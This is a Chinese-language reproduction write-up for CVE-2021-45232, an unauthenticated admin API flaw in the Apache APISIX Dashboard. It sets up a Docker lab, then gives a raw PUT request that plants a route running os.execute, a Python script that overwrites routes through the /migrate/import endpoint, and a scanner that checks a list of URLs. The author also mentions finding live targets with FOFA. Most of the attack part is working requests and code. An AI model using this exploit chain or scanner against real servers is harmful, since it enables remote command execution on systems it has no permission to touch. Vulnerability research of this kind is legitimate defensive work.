[TOC]
一、环境搭建
使用docker搭建环境
修改docker-compose.yml为2.7即可
data:image/s3,"s3://crabby-images/20edc/20edc67180ea444405dc9d13e955cdac03dec470" alt="image-20211229010033230"
data:image/s3,"s3://crabby-images/0635c/0635c0e5ca1f2ff66b4ddf9fbd3dbeccfa7c7d16" alt="image-20211229010627521"
默认账号密码为admin:admin
data:image/s3,"s3://crabby-images/02471/02471884da56cceeb17a3447e05381bafe579fc4" alt="image-20211229010703226"
1、首先添加一个上游
data:image/s3,"s3://crabby-images/39230/392301355f9623b68f84fb82830ceea23d6c275f" alt="image-20211229011121495"
2、添加一个路由
data:image/s3,"s3://crabby-images/d683e/d683ee37912e40ccd63549f620a1df60f9099efe" alt="image-20211229011306186"
然后在上游服务选择,我们新建的上游
data:image/s3,"s3://crabby-images/c0e19/c0e197c1d47529504962f0a1331e775597e59254" alt="image-20211229011333572"
data:image/s3,"s3://crabby-images/f1989/f19893b2bceea743663f8ac00cde86e7085aed74" alt="image-20211229011425631"
二、漏洞复现
获取/apisix/admin/migrate/export
data:image/s3,"s3://crabby-images/b97a6/b97a66497011655ddd06d50e54951caadd5ca907" alt="image-20211229011632863"
构造一个Payload
data:image/s3,"s3://crabby-images/16bde/16bde512e58239bd7ce2b818aa6c1beda0398655" alt="image-20211229011800874"
PUT /apisix/admin/routes/387864323462005443 HTTP/1.1
Host: ip:9000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://106.52.5.116:9000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: -http-session-=1::http.session::e36a9dc03600ce92c8daf29b6a25f5a2
Connection: close
Content-Length: 248
{"uris":["/rce"],"methods":["GET","POST","PUT","DELETE",
"HEAD","OPTIONS","CONNECT","TRACE"],"priority":0,"name":"rce","status":1,"labels":{},"script":"os.execute('touch /tmp/UzJu')",
"upstream_id":"387864007731577539"}
这里有两个地方需要注意,第一就是URL后面routes/后的数字是来自export中的路由ID
而下面的upstreamid是来自export中的上游ID,如果填错会报找不到upstream_id,然后需要把新的覆盖一下
data:image/s3,"s3://crabby-images/c0523/c052314375297286a56339d766860d570eb2c5bd" alt=""
某大佬发了一个文章给我,那里要用go写一个什么CRC的校验啥的,这里的话其实直接访问export就可以了,会自动下载一个bak文件
我们需要直接浏览器访问http://ip:9000/apisix/admin/migrate/export,随后会下载一个名为apisix-config.bak的文件
data:image/s3,"s3://crabby-images/88d11/88d11e9136a5608fe86da0a1ed751f090ff14e2d" alt="image-20211229012156537"
然后发送请求覆盖
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''
@Project :UzJuSecurityTools
@File :test.py
@Author :UzJu
@Date :2021/12/29 12:24 上午
@Email :UzJuer@163.com
'''
import httpx
import requests
target = "http://ip:9000"
url = target + "/apisix/admin/migrate/import"
files = {'file': open('./apisix-config.bak', 'rb')}
r = httpx.post(url, data={"mode": "overwrite"}, files=files, proxies="http://127.0.0.1:8080")
print(r.status_code)
print(r.content)
Ps: 上面写了proxies是因为想把流量给到burp,更好的看清楚请求
data:image/s3,"s3://crabby-images/81a2d/81a2d26821ee653453b5c77b5b94019b239f6317" alt="image-20211229012345037"
随后在路由的地方查看一下,发现成功覆盖了
data:image/s3,"s3://crabby-images/a394c/a394cf17f6f7a35b4e8ef25131ad869ca53835b9" alt="image-20211229021141668"
看看burp接收到的请求
data:image/s3,"s3://crabby-images/14d4d/14d4d9a4a250659a9159ae11b7b234c2abf761ef" alt="image-20211229025018766"
然后访问ip:9080/UzJu
data:image/s3,"s3://crabby-images/d033a/d033a7adb2bdbef59767fb89818e773e71039657" alt="image-20211229021301979"
随后进入docker查看
data:image/s3,"s3://crabby-images/189e6/189e6537c2029d48e52941f7dc9d848e2799b5ad" alt="image-20211229021334139"
三、POC编写
最开始的POC编写思路,比较简单,既然是没做鉴权,那直接请求export然后判断返回的东西或者返回值是不是200不就可以了,先不考虑后续利用
/apisix/admin/migrate/export
/apisix/admin/migrate/import
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''
@Project :UzJuSecurityTools
@File :CVE-2021-45232_POC.py
@Author :UzJu
@Date :2021/12/29 12:03 上午
@Email :UzJuer@163.com
'''
import requests
class Apache_ApiSix_Poc:
def __init__(self, url):
self.url = url + "/apisix/admin/migrate/export"
def checkVuln(self):
headers = {
"Connection": "close"
}
try:
result = requests.get(url=self.url,
headers=headers,
verify=False)
if '{"Consumers":[]' in result.text:
print(f"[+]CVE-2021-45232: {self.url}存在漏洞")
except:
pass
if __name__ == '__main__':
with open('./url.txt', 'r') as f:
for i in f.read().splitlines():
main = Apache_ApiSix_Poc(i)
main.checkVuln()
然后fofa随便找一些站点,搜索语法为
data:image/s3,"s3://crabby-images/bb954/bb954925a044fdf52c69ba223e333ab502b6d9ca" alt="image-20211229023105386"
四、免责声明
本文内容仅用于技术交流,不存在所谓未公开POC,文中未进行打码处理的,全是已公开的POC或利用方式。